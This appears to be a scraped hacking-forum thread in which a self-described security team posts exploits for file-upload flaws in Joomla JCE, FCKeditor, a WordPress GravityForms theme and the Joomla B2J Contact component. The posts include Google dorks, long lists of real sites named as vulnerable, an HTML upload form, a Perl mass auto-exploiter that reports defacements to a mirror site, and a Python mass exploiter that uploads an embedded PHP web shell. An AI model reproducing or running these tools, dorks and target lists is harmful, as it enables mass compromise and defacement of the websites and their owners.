hackers but some hackers do not know about nothing about this vulnerability. So this is the new one. TARGETSİTE/yourfilename.png .gif .jpg or TARGETSİTE/images/yourfilename.html .php .asp .jpg .gif .png ################################################################################# Notes => Joomla Content Editor JCE Toggle Editor / Image Manager behind the Administration Panel [ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg An Attacker cannot reach this image manager without username and password on the control panel. But there is a little trick to upload a image or a file behind this vulnerability. One Attacker must execute with remote file upload code. Watch Videos from Original Sources => Install JCE Editor in Joomla! 2.5 Tutorial [video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video] Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial [video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video] How to Update Upgrade a Joomla! Page that uses JCE: the Joomla Content Editor. Fix the Bugs for this Vulnerability [video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video] ################################################################################# You can check with this exploit codes on your browser if the sites are vulnerable for testing the security. So you will see some errors. Exploit => ....../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 {"result":{"error":true,"result":""},"error":null} Exploit => ...../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload or giving this error => {"result":null,"error":"No function call specified!"} Exploit => /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ {"result":null,"error":"No function call specified!"} Path => TARGETSİTE/yourfilename.png gif jpg or TARGETSİTE/images/yourfilename.png gif jpg html txt ################################################################################# Auto Mass Exploiter Perl => [code]#!/usr/bin/perl use Term::ANSIColor; use LWP::UserAgent; use HTTP::Request; use HTTP::Request::Common qw(POST); $ua = LWP::UserAgent->new(keep_alive => 1); $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"); $ua->timeout (10); system('title JCE Mass Auto Exploiter by KingSkrupellos'); print "JCE Mass Auto Exploiter\n"; print "Coded by KingSkrupellos\n"; print "Cyberizm Digital Security Team\n"; print "Sitelerin Listesi Reyis:"; my $list=<STDIN>; chomp($list); open (THETARGET, "<$list") || die ">>>Web sitesi listesi açılamıyor<<< !"; @TARGETS = <THETARGET>; close THETARGET; $link=$#TARGETS + 1; foreach $site(@TARGETS){ chomp $site; if($site !~ /http:\/\//) { $site = "http://$site/"; }; $exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"; print "wait upload $site\n"; $vulnurl=$site.$exploiturl; $res = $ua->get($vulnurl)->content; if ($res =~ m/No function call specified!/i){ open(save, '>>C:\Users\Kullanıcılar\KingSkrupellos\result\list.txt'); print "\n[Uploading]"; my $res = $ua->post($vulnurl, Content_Type => 'form-data', Content => [ 'upload-dir' => './../../', 'upload-overwrite' => 0, 'Filedata' => ["kingskrupellos.png"], 'action' => 'upload' ] )->decoded_content; if ($res =~ m/"error":false/i){ }else{ print " ......... "; print color('bold white'); print "["; print color('reset'); print color('bold green'); print "PATCHED"; print color('reset'); print color('bold white'); print "] \n"; print color('reset'); } $remote = IO::Socket::INET->new( Proto=> PeerAddr=>"$site", PeerPort=> Timeout=> ); $def= "$site/kingskrupellos.png"; print colored ("[+]Basarili",'white on_red'),"\n"; print "$site/kingskrupellos.png\n"; }else{ print colored (">>Exploit Olmadi<<",'white on_blue'),"\n"; } } sub zonpost{ $req = HTTP::Request->new(GET=>$link); $useragent = LWP::UserAgent->new(); $response = $useragent->request($req); $ar = $response->content; if ($ar =~ /Hacked By KingSkrupellos/){ $dmn= $link; $def="KingSkrupellos"; $zn="http://aljyyosh.org/single.php"; $lwp=LWP::UserAgent->new; $res=$lwp -> post($zn,[ 'defacer' => $def, 'domain1' => $dmn, 'hackmode' => '15', 'reason' => '1', 'Gönder' => 'Send', ]); if ($res->content =~ /color="red">(.*)<\/font><\/li>/) { print colored ("[-]Gönder $1",'white on_green'),"\n"; } else { print colored ("[-]Hata",'black on_white'),"\n"; } }else{ print" Zone Alınmadı !! \n"; } }[/code] How to use this code on your operating system like Windows ; Open Start + Go to Search Button + Type + Command Prompt [ Komut İstemi ] => or cmd.exe Or you can use ConEmulator for Windows => https://conemu.github.io => Download it and use it. Create a folder like " jcee " and put your jceexploit.pl and yourimagefile.png ,gif ,png ,html ,txt C:/Users/Your-Computer-Name/ cd Desktop cd "jcee" perl yourexploitcodenamejce.pl site.txt Waiting for Upload Exploit Successful or Not Finished # Uploaded File/Image Directory Path => TARGETDOMAIN/yourfilename.png .jpg .gif TARGETDOMAIN/images/yourfilename.png .jpg .gif ################################################################################# Example Vulnerable Sites => aXbcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ {"result":{"error":true,"result":""},"error":null} => [ Proof of Concept ] => archive.is/J2eX0 => archive.is/YFanj sXv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} bXuses.co.il/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} irm.edu.vn/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload pigpilot.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload deep-centr.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload wintotal.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload restaurante-chines.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload artlife54.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload litekstent.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload artstairs.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload telltale.co.za/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload zivapodstran.cz/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload littlefolkvisuals.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload practicsa.ro/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload tis.co.th/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload newconcept-cleaning.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload basolatogucciardi.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload finansure.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload kansystem.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload comtec.rs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload esmikom.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload farmacovigilanza-online.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload djgonis.gr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload diktatura.lt/main/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload despachosdigitales.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload gebaeudereinigung-pesch.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload jeddah4arch.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload swmoveisplanejados.com.br/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload psychologie.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload rolsteigerkopen.nl/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload studiocontabilecapuana.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload traversatacarnica.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload arcade-sages-femmes.ch/asf/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload alamoconsulting.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload asociacionchajulense.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload caseyfiliaci.com/joomla/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload dermedica.biz/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload custer.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload gimsusz.pl/joomla/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload guayab.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload physiotherapie-wenus.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload quintasaojoao.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload ocetehnotrade.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload psxm-tkdm.gr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload confatech.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload jeffcole.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload cabanascamilo.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload thesurelink.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload oddjobthesailor.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload linalux-montlesoie.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload mgsopop.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload pascal-it.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload sicurservice.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload balzamcda.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload diaocsontra.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload juergenlagger.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload johnmcfaddenattorney.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload spacious.com.tw/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload kims-ltd.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload percyparkminis.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload THE END ################################################################################# Discovered By KingSkrupellos from Cyberizm Digital Security Team #################################################################################
  6. # Exploit Title : Powered by Quick.Cart & HOST[24] - profi hosting za 24,- Univex.Cz Fckeditor Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Vendor Homepage : opensolution.org ~ univex.cz ~ host24.cz # Google Dorks : intext:''Copyright © 2008 www.univex.cz'' intext:''Powered by Quick.Cart & HOST[24] - profi hosting za 24,-'' site:cz # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE-264 [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060297 ################################################################################################# # Exploit : TARGET/fckeditor/editor/filemanager/connectors/uploadtest.html # Path : TARGET/files/.... ################################################################################################# # Example Vulnerable Sites : designbaterie.cz/fckeditor/editor/filemanager/connectors/uploadtest.html letbalonem-darek.cz/fckeditor/editor/filemanager/connectors/uploadtest.html strihanipsupardubice-salonamber.cz/fckeditor/editor/filemanager/connectors/uploadtest.html krakonosuv-antikvariat.cz/fckeditor/editor/filemanager/connectors/uploadtest.html iventilatory.cz/fckeditor/editor/filemanager/connectors/uploadtest.html strihanipsupardubice-salonamber.cz/fckeditor/editor/filemanager/connectors/uploadtest.html jn-models.cz/fckeditor/editor/filemanager/connectors/uploadtest.html ardewo.cz/eshop/fckeditor/editor/filemanager/connectors/uploadtest.html chalupaholubov.cz/fckeditor/editor/filemanager/connectors/uploadtest.html seftrade.cz/fckeditor/editor/filemanager/connectors/uploadtest.html ################################################################################################ # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  7. # Exploit Title : WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos # Vendor Homepages : athemes.com/theme/sydney/ ~ gravityforms.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ~ CWE-434 [ Unrestricted Upload of File with Dangerous Type ] ################################################################################################# # Google Dork : intext:''Proudly powered by WordPress | Theme: Sydney by aThemes.'' # Exploit HTML Code : <title>WordPress Theme Sydney by aThemes GravityForms Exploiter</title> <form action="http://www.TARGETSITE/?gf_page=upload" method="post" enctype="multipart/form-data"> <body background=" "> <input type="file" name="file" id="file"><br> <input name="form_id" value="../../../" type=hidden"> <input name="name" value="kingskrupellos.html" type=''hidden"> <input name="gform_unique_id" value="../../" type="hidden"> <input name="field_id" value="" type="hidden"> <input type="submit" name="gform_submit" value="submit"> </form> [img=http://www.imageupload.co.uk/images/2018/06/08/gravityphp5athemes.png] Exploit : TARGET/?gf_page=upload We cannot upload directly with this exploit. But we can upload our file to the site with remote file exploiter. # Error : {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}} [img=http://www.imageupload.co.uk/images/2018/06/08/miplantest1.png] # Error [ Successful ] : {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}} [img=http://www.imageupload.co.uk/images/2018/06/08/miplantest2.png] # Allowed File Extensions : .html .htm .php5 .txt .jpg .gif .png .html.fla .phtml .pdf # You don't need to change your filename as _input__kingskrupellos.php5 like this. # Just choose a file from your machine and upload it with the beforementioned extensions. # For example : yourfilename.php file will upload to the server [ site ] like this. /_input__kingskrupellos.php5 # Example Usage for Windows : # Use with XAMPP Control Panel and your Localhost. # Use from htdocs folder located in XAMPP # 127.0.0.1/athemeswordpressexploiter.html # Path : TARGET/_input__kingskrupellos.php5 [img=http://www.imageupload.co.uk/images/2018/06/08/Screenshot_1.png] ################################################################################################# # Example Site => miplantestclub.com => [ Proof of Concept ] => archive.is/APl6J [ Error ] => archive.is/7G0Jq [ Successful ] ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  8. # Exploit Title : Joomla Codextrous Com_B2jcontact Component Shell Upload Vulnerability Auto Exploiter Python # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 24/06/2018 # Vendor Homepage : codextrous.com/joomla-components/b2j-contact.html ~ extensions.joomla.org/extension/b2j-contact/ # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] + CWE-434 [ Unrestricted Upload of File with Dangerous Type ] ################################################################################################# # Description : B2J Contact is one of the most popular extension of Codextrous which is used for create Contact forms. This revolutionary, multi-functional Joomla! contact form component is super easy-to-install, that brings you the ultimate in User Experience with its clean design and user friendly backend. You can create as many contact forms as you want. You can create a contact form and to display it you create its menu as well. B2J Contact component comes with a module also, by which you can display contact form where ever you want. B2J Contact has got the following main options which users may customize: Basic Option - Default Fields - Dynamic Fields - Events - Security Each section on its own opens up great custom options/fields for you to play with to get your contact form up and running smoothly. Despite its enormous functionality, B2J Contact Component is extremely lightweight with an amazing design. Whether you are making an online survey or simply creating another contact form, B2J Contact Component is there to help you! B2J Contact comes with all the below mentioned key features and more: Joomla! 3.0 Support - In-buit Form Builder - Access to extension support system - All features shown on the Demo ################################################################################################# # Google Dorks : inurl:''/index.php?option=com_b2jcontact'' inurl:''/components/com_b2jcontact/'' intext:''Another Great Website by One Spot Media.'' intext:''Bootstrap is a front-end framework of Twitter, Inc. Code licensed under MIT License. Font Awesome font licensed under SIL OFL 1.1.'' intext:''POWERED BY VISUALPROJECT WEB'' intext:''© 2013-2014 Opentec SRL, tutti i diritti riservati.'' intext:''honlap: rosko.hu'' +There are more dorks. Use your brain to find more. # Exploit : /index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah # Error displaying on the page [ Error Language changes according to the country ] : {"error":"File is empty."} {"error":"No files were uploaded."} {"error":"null."} {"error":"Keine Dateien hochgeladen."} # Uploaded File Path : /components/com_b2jcontact/..... # Allowed File Extensions : .php .php5 .html .txt .jpg .jpeg .gif .png .xml .pdf and other extensions. # Use Auto Exploiter Tool for this Vulnerability. ################################################################################################# # Auto Exploitation Tool Python => import requests as r import argparse as arg import os, sys import urllib2,urllib,re from multiprocessing import Pool from multiprocessing.dummy import Pool as ThreadPool from urlparse import urlparse import random, string #Coded By KingSkrupellos #Cyberizm Digital Security Team def wibu(length): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(length)) shell = """ <?php function fUUPd($NVAR) { $NVAR=gzinflate(base64_decode($NVAR)); for($i=0;$i<strlen($NVAR);$i++) { $NVAR[$i] = chr(ord($NVAR[$i])-1); } return $NVAR; <?php set_time_limit(0); error_reporting(0); if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value); } } echo '<!DOCTYPE HTML> <HTML> <HEAD> <link href="" rel="stylesheet" type="text/css"> <title> CyBeRizM Dosya Yöneticisi Sh3LL </title> <center><img src="http://i.hizliresim.com/3vnXyj.gif"></center> <style> body{ font-family: "Racing Sans One", cursive; background-color: #e6e6e6; text-shadow:0px 0px 1px #757575; } #content tr:hover{ background-color: #636263; text-shadow:0px 0px 10px #fff; } #content .first{ background-color: silver; } #content .first:hover{ background-color: silver; text-shadow:0px 0px 1px #757575; } table{ border: 1px #000000 dotted; } H1{ font-family: "Rye", cursive; } a{ color: #000; text-decoration: none; } a:hover{ color: #fff; text-shadow:0px 0px 10px #ffffff; } input,select,textarea{ border: 1px #000000 solid; -moz-border-radius: 5px; -webkit-border-radius:5px; border-radius:5px; } </style> </HEAD> <BODY> <H1><center> Cyberizm.Org / KingSkrupellos </center></H1> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> <tr><td>Nerde miyim? : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '<a href="?path=/">/</a>'; continue; } if($pat == '') continue; echo '<a href="?path='; for($i=0;$i<=$id;$i++){ echo "$paths[$i]"; if($i != $id) echo "/"; } echo '">'.$pat.'</a>/'; } echo '</td></tr><tr><td>'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '<font color="green">Dosya Yüklendi</font><br />'; }else{ echo '<font color="red">Dosya Yüklenemedi</font><br />'; } } echo '<form enctype="multipart/form-data" method="POST"> Dosya Yükle : <input type="file" name="file" /> <input type="submit" value="Yükle" /> </form> </td></tr>'; if(isset($_GET['filesrc'])){ echo "<tr><td>Current File : "; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '</table><br /><center>'.$_POST['path'].'<br /><br />'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo '<font color="green">Tamamdır!</font><br />'; }else{ echo '<font color="red">Malesef!</font><br />'; } } echo '<form method="POST"> Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="chmod"> <input type="submit" value="Go" /> </form>'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '<font color="green">Kaydedildi.</font><br />'; }else{ echo '<font color="red">Kaydedilemedi.</font><br />'; } $_POST['name'] = $_POST['newname']; } echo '<form method="POST"> New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="rename"> <input type="submit" value="Go" /> </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo '<font color="green">Kaydedildi.</font><br />'; }else{ echo '<font color="red">Kaydedilemedi.</font><br />'; } fclose($fp); } echo '<form method="POST"> <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="edit"> <input type="submit" value="Go" /> </form>'; } echo '</center>'; }else{ echo '</table><br /><center>'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '<font color="green">Kaydedildi</font><br />'; }else{ echo '<font color="red">Malesef</font><br />'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo '<font color="green">Silindi.</font><br />'; }else{ echo '<font color="red">Silinemedi.</font><br />'; } } } echo '</center>'; $scandir = scandir($path); echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> <tr class="first"> <td><center>Dosya Adı</center></td> <td><center>Boyut</center></td> <td><center>İzinler</center></td> <td><center>Ayarlar</center></td> </tr>'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "<tr> <td><a href=\"?path=$path/$dir\">$dir</a></td> <td><center>--</center></td> <td><center>"; if(is_writable("$path/$dir")) echo '<font color="green">'; elseif(!is_readable("$path/$dir")) echo '<font color="red">'; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>'; echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"> <select name=\"opt\"> <option value=\"\"></option> <option value=\"delete\">Sil</option> <option value=\"chmod\">Dizin Yeri </option> <option value=\"rename\">Adı Değiştir</option> </select> <input type=\"hidden\" name=\"type\" value=\"dir\"> <input type=\"hidden\" name=\"name\" value=\"$dir\"> <input type=\"hidden\" name=\"path\" value=\"$path/$dir\"> <input type=\"submit\" value=\">\" /> </form></center></td> </tr>"; } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>'; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo "<tr> <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td> <td><center>".$size."</center></td> <td><center>"; if(is_writable("$path/$file")) echo '<font color="green">'; elseif(!is_readable("$path/$file")) echo '<font color="red">'; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>'; echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"> <select name=\"opt\"> <option value=\"\"></option> <option value=\"delete\">Sil</option> <option value=\"chmod\">Dizin</option> <option value=\"rename\">Adı Değiştir</option> <option value=\"edit\">Düzenle</option> </select> <input type=\"hidden\" name=\"type\" value=\"file\"> <input type=\"hidden\" name=\"name\" value=\"$file\"> <input type=\"hidden\" name=\"path\" value=\"$path/$file\"> <input type=\"submit\" value=\">\" /> </form></center></td> </tr>"; } echo '</table> </div>'; } echo '<br />Only belongs to KingSkrupellos </font>, Recoded By <font color="red">KingSkrupellos / Cyberizm.Org |</font><br />Bilgi: <font color="red">http://www.cyberizm.org/</font> </BODY> </HTML>'; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>""" def Fox_Contact(url): if url[-1] != "/": url = site + "/" if url[:7] != "http://" and url[:8] != "https://": url = "http://" + url return url user_agent = {'User-agent': 'Mozilla/5.0'} try : Filelist = open(sys.argv[1], 'r').readlines() for i in Filelist: try: url=i.strip() urlpa = urlparse(url) site = urlpa.netloc site=Fox_Contact(url) print "[#]Url:"+site req = urllib2.Request(url) opreq = urllib2.urlopen(req).read() b2jcomids = re.findall('<a name="b2jcomid_(.*?)"></a>',opreq) print "[+]Exploiting b2jcomid" for b2jcomid in b2jcomids: b2jcomid=str(b2jcomid) print "[#]b2jcomid:"+b2jcomid halah = str("common.php") b0x_dir = [("index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah)] diretorios=0 for diretorio in b0x_dir: diretorios += 1 url_vuln = site + diretorio shell_dir = site + "/components/com_b2jcontact/"+halah+"?ina" checa_site = r.get(url_vuln, headers=user_agent) if '{"' in checa_site.text: print( "\n[!] exploiting in {}...".format(diretorios)) envia_shell = r.post(url_vuln, data=shell, headers=user_agent) verifica_shell = r.get(shell_dir, headers=user_agent) if "Cwd:" in verifica_shell.text: a = open('Attacker.txt','a') a.write(shell_dir+'\n') print( "\n[*]Good 1 ") print( "[+] deface dir "+shell_dir) else: print("shell Upload *_* : ", shell_dir) else: print("\n[-] Fuck Sites : {}.".format(diretorios)) except Exception as ex : print "[#]Fuck Site !~! " pool = ThreadPool(10) pool.map(Fox_Contact, Filelist) pool.close() pool.join() except : print "[+] You not inputing list file" ################################################################################################# CVE Details => cvedetails.com/vulnerability-list/vendor_id-16496/product_id-37996/Codextrous-B2j-Contact.html CVE-2017-9030 The Codextrous B2J Contact (aka b2j_contact) extension before 2.1.13 for Joomla! allows a directory traversal attack that bypasses a uniqid protection mechanism, and makes it easier to read arbitrary uploaded files. CVE-2017-5215 The Codextrous B2J Contact (aka b2j_contact) extension before 2.1.13 for Joomla! allows a rename attack that bypasses a "safe file extension" protection mechanism, leading to remote code execution. CVE-2017-5214 The Codextrous B2J Contact (aka b2j_contact) extension before 2.1.13 for Joomla! allows prediction of a uniqid value based on knowledge of a time value. This makes it easier to read arbitrary uploaded files. ################################################################################################# Another Exploiter Tool Python Coded [ If another exploit don't work - use this - Only Shell Code Changed ] ghostbin.com/paste/psoza - archive.is/sDumw ################################################################################################# # Example Sites : garrhotel.com/welcome/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"%20halah&lang=en nuovaestetica.it/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah masthamnsoperan.se/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah raiffeisen-schwaben-allgaeu.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah best-sl.fr/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah lsvgz.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"%20halah&lang=en strand-catering.com/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah drtoldilaszlo.hu/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah kleintierverhalten.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah infortelematica.it/site/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah cosmo-homes.com/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah 